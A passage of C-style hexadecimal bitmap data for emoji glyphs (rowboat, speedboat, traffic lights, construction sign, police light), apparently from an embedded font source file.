0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xcd,
0xc0, 0x3f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x1,
0xff, 0x80, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xff, 0x1, 0xc3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x7, 0xfe, 0x3, 0x87, 0x0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xfc, 0x7, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xf8, 0xf, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0xf0, 0x1f, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xe0, 0x3f,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xc0,
0x7f, 0xe0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xff,
0x80, 0xff, 0xc0, 0x0, 0x0, 0x1, 0xff, 0xff,
0xff, 0xe1, 0xff, 0x80, 0x0, 0x0, 0x3, 0xff,
0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0, 0x7,
0x0, 0x1, 0xcf, 0xff, 0xfe, 0x0, 0x0, 0x0,
0xe, 0x0, 0x3, 0x80, 0x3f, 0xff, 0xfc, 0x0,
0x0, 0x18, 0x0, 0x7, 0x0, 0x0, 0xff, 0xf8,
0x0, 0x0, 0x30, 0x0, 0xe, 0x0, 0x0, 0x3,
0xf0, 0x0, 0x0, 0x7f, 0xff, 0xff, 0x80, 0x0,
0x0, 0x60, 0x0, 0x0, 0xff, 0xff, 0xfe, 0x39,
0x80, 0x0, 0xc0, 0x0, 0x1, 0x80, 0x0, 0x70,
0x73, 0x9c, 0x1, 0x80, 0x0, 0x7, 0x0, 0x1,
0xe0, 0x7, 0x38, 0xc3, 0x0, 0x0, 0xe, 0x0,
0x3, 0x80, 0x0, 0x73, 0x8e, 0x0, 0x0, 0x1c,
0x0, 0x7, 0x0, 0x0, 0x7, 0x1c, 0x0, 0x0,
0x38, 0x0, 0xe, 0x0, 0x0, 0x0, 0x38, 0x0,
0x0, 0x7f, 0xff, 0xff, 0x0, 0x0, 0x0, 0x70,
0x0, 0x1, 0xff, 0xff, 0xff, 0x38, 0x0, 0x0,
0xe0, 0x0, 0x3, 0x80, 0x0, 0xe4, 0x73, 0x8c,
0x1, 0xc0, 0x0, 0x7, 0x0, 0x1, 0xc0, 0x7,
0x18, 0xe3, 0x0, 0x0, 0x1c, 0x0, 0x3, 0x80,
0x0, 0x31, 0xc6, 0x0, 0x0, 0x38, 0x0, 0xe,
0x0, 0x0, 0x3, 0xf, 0xf0, 0x0, 0xff, 0xff,
0xff, 0x0, 0x0, 0x0, 0x1f, 0xe0, 0x1, 0xff,
0xff, 0xf6, 0x39, 0x0, 0x0, 0x1, 0xc0, 0x7,
0x0, 0x0, 0xe4, 0x73, 0x9c, 0x0, 0x3, 0x80,
0xe, 0x0, 0x1, 0x80, 0x6, 0x39, 0xc0, 0x6,
0x0, 0x1c, 0x0, 0x3, 0x0, 0x0, 0x73, 0x8c,
0xc, 0x0, 0x38, 0x0, 0x6, 0x0, 0x0, 0x7,
0x38, 0xd8, 0x0, 0x70, 0x0, 0xc, 0x0, 0x0,
0x0, 0x73, 0xb0, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x0, 0x7, 0x61, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x0, 0x0, 0xc3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfc, 0x3, 0x87, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe7, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xb8, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xff, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xff, 0xfe, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x7, 0xfd, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0xf1, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf0, 0x1, 0xe3, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xf3, 0xc7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x87,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf0, 0x3f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x3f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc0, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0,
/* U+1F6A3 "🚣" */
0x0, 0x0, 0x7f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xe0, 0x1, 0x80,
0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xe0, 0x1,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xc0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0x0, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xff, 0xc0, 0x3f, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xf0, 0x7f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xe0,
0x18, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xe0, 0x18, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xff, 0xf0, 0x30, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xff, 0xf0, 0x30, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xf0, 0x60, 0x0, 0x0, 0x0,
0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0xe0, 0x0, 0x0, 0x0, 0xc0,
0x0, 0x0, 0x0, 0x38, 0x60, 0x0, 0x0, 0x0,
0xc0, 0x0, 0x0, 0x0, 0x38, 0x70, 0x0, 0x0,
0x0, 0x80, 0x0, 0x0, 0x0, 0x38, 0x70, 0x0,
0x0, 0x1, 0x80, 0x0, 0x0, 0x0, 0x38, 0x30,
0x0, 0x0, 0x1, 0x80, 0x0, 0x0, 0x0, 0x38,
0x38, 0x0, 0x0, 0x3, 0x0, 0x0, 0x0, 0x0,
0x70, 0x38, 0x0, 0x0, 0x3, 0x0, 0x0, 0x0,
0x0, 0x70, 0x1c, 0x0, 0x0, 0x1f, 0x0, 0x0,
0x0, 0x0, 0x70, 0x1c, 0x0, 0x0, 0x3f, 0x0,
0x0, 0x0, 0x0, 0x70, 0xe, 0x0, 0x0, 0x7f,
0x80, 0x0, 0x0, 0x0, 0xe0, 0x7, 0x0, 0x0,
0xff, 0x80, 0x0, 0x0, 0x0, 0xe0, 0x7, 0x0,
0x0, 0xff, 0x80, 0x0, 0x0, 0x1, 0xc0, 0x3,
0xc0, 0x1, 0xff, 0x80, 0x0, 0x1f, 0x1, 0xc0,
0x1, 0xe0, 0x3f, 0xff, 0x80, 0x1, 0xff, 0xe3,
0x80, 0x0, 0xf0, 0xff, 0xff, 0x80, 0x7, 0xf3,
0xff, 0x80, 0x0, 0x7f, 0xe0, 0x3f, 0x80, 0xf,
0x0, 0x3f, 0x0, 0x20, 0x3f, 0x0, 0x7, 0xe0,
0x7c, 0x0, 0xf, 0xff, 0x3f, 0xfc, 0x0, 0x1,
0xff, 0xf0, 0x0, 0x1, 0xff, 0x3f, 0xc0, 0x0,
0x0, 0x3f, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x7,
0xfc, 0x0, 0x1, 0xff, 0xc0, 0x0, 0x0, 0x0,
0x1f, 0xff, 0x80, 0x7, 0xf3, 0xf0, 0x0, 0x0,
0x0, 0xfc, 0x7, 0xe0, 0x3f, 0x0, 0x3f, 0xc0,
0x0, 0x7f, 0xe0, 0x0, 0xff, 0xfc, 0x0, 0xf,
0xc0, 0x0, 0x7f, 0x0, 0x0, 0x3f, 0xe0, 0x0,
0x0, 0x0,
/* U+1F6A4 "🚤" */
0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1e, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x3e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xfc, 0x0, 0x78, 0x0, 0x0,
0xf, 0xe0, 0x0, 0xff, 0xff, 0xf0, 0x1, 0xff,
0xff, 0xc0, 0xff, 0x80, 0x7f, 0xfc, 0x3, 0xe0,
0x7, 0xff, 0xff, 0x7, 0xfc, 0x3f, 0xf0, 0x0,
0x7, 0xc0, 0x1e, 0x0, 0x1e, 0x3f, 0xe7, 0xf8,
0x0, 0x0, 0x1f, 0x80, 0x70, 0x0, 0x79, 0xff,
0x1e, 0x0, 0x0, 0x0, 0x3f, 0x81, 0xc0, 0x1,
0xff, 0xf8, 0xff, 0x0, 0x0, 0x0, 0x3f, 0xcf,
0xfe, 0x3, 0xff, 0xc3, 0xff, 0x0, 0x0, 0x0,
0x3f, 0xff, 0xf8, 0xf, 0xfe, 0x1c, 0xff, 0xc0,
0x0, 0x0, 0x3f, 0xff, 0xf0, 0x3f, 0xf0, 0x70,
0x7f, 0xf0, 0x0, 0x0, 0xf, 0xff, 0xc0, 0x7f,
0x3, 0xe0, 0x1f, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x1, 0xf8, 0xf, 0xe0, 0xf, 0xff, 0x80, 0x0,
0x0, 0x0, 0x7, 0x80, 0x3b, 0xe0, 0x1, 0xff,
0xf8, 0x0, 0x0, 0x0, 0x1e, 0x0, 0xe7, 0xf0,
0x0, 0x3f, 0xff, 0xc0, 0x0, 0x0, 0x3c, 0x3,
0x87, 0xf8, 0x0, 0x3, 0xff, 0xff, 0xc0, 0x0,
0xe0, 0xe, 0x3, 0xfc, 0x0, 0x0, 0xf, 0xff,
0xff, 0xff, 0x80, 0x3c, 0x1, 0xff, 0x80, 0x0,
0x0, 0xf, 0xff, 0xfc, 0x0, 0xf0, 0x0, 0x7f,
0xff, 0x80, 0x0, 0x0, 0x0, 0xe0, 0x1, 0xe0,
0x0, 0xf, 0xff, 0xfc, 0x0, 0x0, 0x6, 0x0,
0x7, 0xc0, 0x0, 0x0, 0x3f, 0xc0, 0x0, 0x0,
0x30, 0x0, 0xf, 0x80, 0x0, 0x0, 0x78, 0x0,
0x0, 0x3, 0x80, 0x0, 0x1f, 0x0, 0x0, 0xf,
0xff, 0xff, 0xff, 0xfc, 0x0, 0x0, 0x3f, 0x0,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x7f, 0x0, 0x0, 0x3, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x30, 0x0, 0x0, 0x0, 0x7f, 0x80, 0x0, 0x0,
0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x3f, 0xe0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xfc, 0x0, 0x0, 0x0, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xf8, 0x0, 0x6, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xff,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xff, 0xff, 0x80,
/* U+1F6A5 "🚥" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xe1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xe7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xb8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7e, 0x0, 0xfe, 0x0, 0x1, 0xfe,
0x0, 0x1, 0xfc, 0x1, 0xf8, 0x1f, 0xfe, 0x0,
0x1f, 0xfe, 0x0, 0x1f, 0xfe, 0x7, 0xe0, 0xf0,
0x3e, 0x1, 0xf0, 0x3e, 0x1, 0xf0, 0x3c, 0x1f,
0x8f, 0x0, 0x3c, 0xf, 0x0, 0x3c, 0xf, 0x0,
0x3c, 0x7e, 0x70, 0x0, 0x38, 0x70, 0x0, 0x38,
0x70, 0x0, 0x39, 0xf8, 0x83, 0xf0, 0x40, 0x83,
0xf0, 0x40, 0x83, 0xf0, 0x47, 0xe0, 0x3f, 0xf0,
0x0, 0x3f, 0xf0, 0x0, 0x3f, 0xf0, 0x1f, 0x81,
0xe1, 0xe0, 0x1, 0xe1, 0xe0, 0x1, 0xe1, 0xe0,
0x7e, 0xe, 0x1, 0xc0, 0xe, 0x1, 0xc0, 0xe,
0x1, 0xc1, 0xf8, 0x70, 0x3, 0x80, 0x70, 0x3,
0x80, 0x70, 0x3, 0x87, 0xe1, 0xc0, 0xe, 0x1,
0xc0, 0xe, 0x1, 0xc0, 0xe, 0x1f, 0x8e, 0x0,
0x1c, 0xe, 0x0, 0x1c, 0xe, 0x0, 0x1c, 0x7e,
0x38, 0x0, 0x70, 0x38, 0x0, 0x70, 0x38, 0x0,
0x71, 0xf8, 0xe0, 0x1, 0xc0, 0xe0, 0x1, 0xc0,
0xe0, 0x1, 0xc7, 0xe3, 0x80, 0x7, 0x3, 0x80,
0x7, 0x3, 0x80, 0x7, 0x1f, 0x8e, 0x0, 0x1c,
0xe, 0x0, 0x1c, 0xe, 0x0, 0x1c, 0x7e, 0x1c,
0x0, 0xe0, 0x1c, 0x0, 0xe0, 0x1c, 0x0, 0xe1,
0xf8, 0x70, 0x3, 0x80, 0x70, 0x3, 0x80, 0x70,
0x3, 0x87, 0xe0, 0xe0, 0x1c, 0x0, 0xe0, 0x1c,
0x0, 0xe0, 0x1c, 0x1f, 0x81, 0xe1, 0xe0, 0x1,
0xe1, 0xe0, 0x1, 0xe1, 0xe0, 0x7e, 0x3, 0xff,
0x0, 0x3, 0xff, 0x0, 0x3, 0xff, 0x1, 0xf8,
0x3, 0xf0, 0x0, 0x3, 0xf0, 0x0, 0x3, 0xf0,
0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1d, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe7, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x87, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
/* U+1F6A6 "🚦" */
0x1f, 0xff, 0xff, 0xf0, 0xff, 0xff, 0xff, 0xf1,
0xc0, 0x0, 0x0, 0x77, 0x0, 0x0, 0x0, 0x7e,
0x0, 0xfe, 0x0, 0xfc, 0x7, 0xff, 0x1, 0xf8,
0x1e, 0xf, 0x3, 0xf0, 0x70, 0x7, 0x7, 0xe0,
0x47, 0xc4, 0xf, 0xc0, 0x3f, 0xe0, 0x1f, 0x80,
0xe1, 0xe0, 0x3f, 0x1, 0x80, 0xc0, 0x7e, 0x6,
0x0, 0xc0, 0xfc, 0xc, 0x1, 0x81, 0xf8, 0x18,
0x3, 0x3, 0xf0, 0x30, 0x6, 0x7, 0xe0, 0x60,
0xc, 0xf, 0xc0, 0x60, 0x30, 0x1f, 0x80, 0xe0,
0xe0, 0x3f, 0x0, 0xff, 0x80, 0x7e, 0x0, 0x7c,
0x0, 0xfc, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0,
0x3, 0xf0, 0x7, 0xf0, 0x7, 0xe0, 0x3f, 0xf8,
0xf, 0xc0, 0xf0, 0x78, 0x1f, 0x83, 0x80, 0x38,
0x3f, 0x2, 0x3e, 0x20, 0x7e, 0x1, 0xff, 0x0,
0xfc, 0x7, 0x8e, 0x1, 0xf8, 0xc, 0x6, 0x3,
0xf0, 0x38, 0xe, 0x7, 0xe0, 0x60, 0xc, 0xf,
0xc0, 0xc0, 0x18, 0x1f, 0x81, 0x80, 0x30, 0x3f,
0x3, 0x0, 0x60, 0x7e, 0x7, 0x1, 0xc0, 0xfc,
0x6, 0x3, 0x1, 0xf8, 0x7, 0x1c, 0x3, 0xf0,
0xf, 0xf8, 0x7, 0xe0, 0x7, 0xc0, 0xf, 0xc0,
0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x3f, 0x0,
0x7f, 0x0, 0x7e, 0x3, 0xff, 0x80, 0xfc, 0xf,
0x7, 0x81, 0xf8, 0x38, 0x3, 0x83, 0xf0, 0x23,
0xe2, 0x7, 0xe0, 0x1f, 0xf0, 0xf, 0xc0, 0x78,
0xe0, 0x1f, 0x80, 0xc0, 0x60, 0x3f, 0x3, 0x80,
0xe0, 0x7e, 0x6, 0x0, 0xc0, 0xfc, 0xc, 0x1,
0x81, 0xf8, 0x18, 0x3, 0x3, 0xf0, 0x30, 0x6,
0x7, 0xe0, 0x70, 0x1c, 0xf, 0xc0, 0x60, 0x30,
0x1f, 0x80, 0x71, 0xc0, 0x3f, 0x0, 0xff, 0x80,
0x7e, 0x0, 0x7c, 0x0, 0xee, 0x0, 0x0, 0x3,
0x9f, 0xff, 0xff, 0xfe, 0xf, 0xff, 0xff, 0xf8,
/* U+1F6A7 "🚧" */
0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x3, 0xf0,
0x0, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x1, 0xff,
0x80, 0x3c, 0x3c, 0x0, 0x0, 0x0, 0x0, 0xf8,
0x78, 0xe, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x3c,
0x3, 0x83, 0x89, 0x1c, 0x0, 0x0, 0x0, 0x7,
0x12, 0x38, 0x70, 0xc3, 0x80, 0x0, 0x0, 0x1,
0xe2, 0x87, 0xc, 0x18, 0x30, 0x0, 0x0, 0x0,
0x38, 0x70, 0x61, 0x8f, 0xe6, 0x0, 0x0, 0x0,
0x7, 0x3f, 0xcc, 0x30, 0xf0, 0xc0, 0x0, 0x0,
0x0, 0xe1, 0xe1, 0x86, 0x1f, 0x18, 0x0, 0x0,
0x0, 0x1c, 0x3c, 0x30, 0xe5, 0x7, 0x0, 0x0,
0x0, 0x3, 0xca, 0x4e, 0x1c, 0x20, 0xe0, 0x0,
0x0, 0x0, 0x38, 0x41, 0xc1, 0xc0, 0x38, 0x0,
0x0, 0x0, 0x3, 0x80, 0x70, 0x1e, 0x1e, 0x0,
0x0, 0x0, 0x0, 0x7c, 0x3c, 0x1, 0xff, 0x80,
0x0, 0x0, 0x0, 0x3, 0xff, 0x0, 0x3f, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xe0, 0x7, 0xfe,
0x0, 0x0, 0x0, 0x0, 0xf, 0xfc, 0x0, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x1, 0xff, 0x83, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x80, 0x7, 0xfc, 0x0, 0x3f, 0xc0, 0x1, 0xff,
0xe0, 0x1, 0xff, 0x0, 0xf, 0xf0, 0x0, 0x7f,
0xf8, 0x0, 0x7f, 0xc0, 0x3, 0xfc, 0x0, 0x1f,
0xff, 0x0, 0x1f, 0xf0, 0x0, 0xff, 0x0, 0x7,
0xff, 0xe0, 0x7, 0xfc, 0x0, 0x3f, 0xc0, 0x1,
0xff, 0xfc, 0x1, 0xff, 0x0, 0xf, 0xf0, 0x0,
0x7f, 0xdf, 0x80, 0x7f, 0xc0, 0x3, 0xfc, 0x0,
0x1f, 0xf3, 0xf0, 0x1f, 0xf0, 0x0, 0xff, 0x0,
0x7, 0xfc, 0x7e, 0x7, 0xfc, 0x0, 0x3f, 0xc0,
0x1, 0xff, 0xf, 0xc0, 0xff, 0x0, 0xf, 0xf8,
0x0, 0x7f, 0xc1, 0xf8, 0x3f, 0xc0, 0x3, 0xfe,
0x0, 0x1f, 0xf0, 0x3f, 0xf, 0xf0, 0x0, 0xff,
0x80, 0x7, 0xfc, 0x7, 0xe3, 0xfc, 0x0, 0x3f,
0xe0, 0x1, 0xff, 0x0, 0xfc, 0xff, 0x0, 0xf,
0xf8, 0x0, 0x7f, 0xc0, 0x1f, 0xbf, 0xc0, 0x3,
0xfe, 0x0, 0x1f, 0xf0, 0x3, 0xff, 0xf0, 0x0,
0xff, 0x80, 0x7, 0xfc, 0x0, 0x7f, 0xfc, 0x0,
0x1f, 0xe0, 0x1, 0xff, 0x0, 0xf, 0xff, 0x0,
0x7, 0xf8, 0x0, 0x7f, 0xc0, 0x3, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0xe1, 0xc0, 0x0, 0x0, 0x0, 0x1, 0xc3, 0x80,
0x1c, 0x38, 0x0, 0x0, 0x0, 0x0, 0x38, 0x70,
0x3, 0x87, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe,
0x0, 0x70, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xe1,
0xc0, 0xe, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x38, 0x1, 0xc3, 0x80, 0x0, 0x0, 0x0, 0x3,
0x87, 0x0, 0x38, 0x70, 0x0, 0x0, 0x0, 0x0,
0x70, 0xe0, 0x7, 0xe, 0x0, 0x0, 0x0, 0x0,
0xe, 0x1c, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0,
0x1, 0xc3, 0x80, 0x1c, 0x38, 0x0, 0x0, 0x0,
0x0, 0x38, 0x70, 0x3, 0x87, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe, 0x0, 0x70, 0xe0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0xe, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x38, 0x1, 0xc3, 0x80, 0x0,
0x0, 0x0, 0x3, 0x87, 0x0, 0x38, 0x70, 0x0,
0x0, 0x0, 0x0, 0x70, 0xe0, 0x7, 0xe, 0x0,
0x0, 0x0, 0x0, 0xe, 0x1c, 0x0, 0xe1, 0xc0,
0x0, 0x0, 0x0, 0x1, 0xc3, 0x80, 0x1c, 0x38,
0x0, 0x0, 0x0, 0x0, 0x38, 0x70, 0x3, 0x87,
0x0, 0x0, 0x0, 0x0, 0x7, 0xe, 0x0, 0x70,
0xe0, 0x0, 0x0, 0x0, 0x0, 0xe1, 0xc0, 0xe,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x38, 0x1,
0xff, 0x80, 0x0, 0x0, 0x0, 0x3, 0xff, 0x0,
0xf, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x80,
/* U+1F6A8 "🚨" */
0x0, 0x0, 0x3, 0xff, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x3, 0xff, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x7f, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0,
0xf, 0xff, 0xfb, 0xff, 0xfe, 0x0, 0x0, 0x0,
0xff, 0xff, 0xdf, 0xff, 0xf8, 0x0, 0x0, 0x7,
0xff, 0xfe, 0xff, 0xff, 0xc0, 0x0, 0x0, 0x77,
0xff, 0xf7, 0xff, 0xf7, 0x0, 0x0, 0x3, 0xdf,
0xff, 0x9f, 0xff, 0x78, 0x0, 0x0, 0x3e, 0x7f,
0xf8, 0xff, 0xf3, 0xe0, 0x0, 0x1, 0xf9, 0xff,
0xc7, 0xff, 0x3f, 0x0, 0x0, 0xf, 0xe7, 0xfe,
0x3f, 0xf3, 0xf8, 0x0, 0x0, 0xff, 0x1f, 0xf1,
0xff, 0x1f, 0xc0, 0x0, 0x7, 0xfc, 0x7f, 0x8f,
0xf1, 0xff, 0x0, 0x0, 0x3f, 0xf1, 0xfc, 0x7f,
0xf, 0xf8, 0x0, 0x1, 0xff, 0x87, 0xe3, 0xf0,
0xff, 0xc0, 0x0, 0xf, 0xfe, 0x1f, 0x1f, 0xf,
0xfe, 0x0, 0x0, 0xff, 0xf0, 0x70, 0x70, 0x7f,
0xf8, 0x0, 0x7, 0xff, 0xc1, 0x83, 0x7, 0xff,
0xc0, 0x0, 0x3f, 0xff, 0x0, 0x0, 0x7f, 0xfe,
0x0, 0x1, 0xff, 0xf8, 0x0, 0x3, 0xff, 0xf0,
0x0, 0xf, 0xff, 0xe0, 0x0, 0x3f, 0xff, 0x80,
0x0, 0xff, 0xff, 0x0, 0x1, 0xff, 0xfe, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x3f, 0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x1,
0xfe, 0x0, 0x0, 0x0, 0x3, 0xfc, 0x0, 0xf,
0xfe, 0x0, 0x0, 0x0, 0xff, 0xe0, 0x0, 0x7f,
0xfc, 0x0, 0x0, 0x1f, 0xff, 0x0, 0x7, 0xff,
0xf0, 0x0, 0x1, 0xff, 0xf8, 0x0, 0x3f, 0xff,
0x80, 0x0, 0xf, 0xff, 0xe0, 0x1, 0xff, 0xf8,
0x0, 0x0, 0x3f, 0xff, 0x0, 0xf, 0xff, 0x80,
0x0, 0x0, 0xff, 0xf8, 0x0, 0x7f, 0xf8, 0x0,
0x0, 0x1, 0xff, 0xc0, 0x3, 0xff, 0x0, 0x0,
0x0, 0x7, 0xfe, 0x0, 0x1f, 0xf0, 0x18, 0x0,
0x30, 0x1f, 0xf0, 0x0, 0xfe, 0x7, 0xc0, 0x1,
0xf0, 0x3f, 0x80, 0x7, 0xe0, 0xfe, 0x0, 0xf,
0xe0, 0xfc, 0x0, 0x7e, 0x1f, 0xf0, 0xf8, 0x7f,
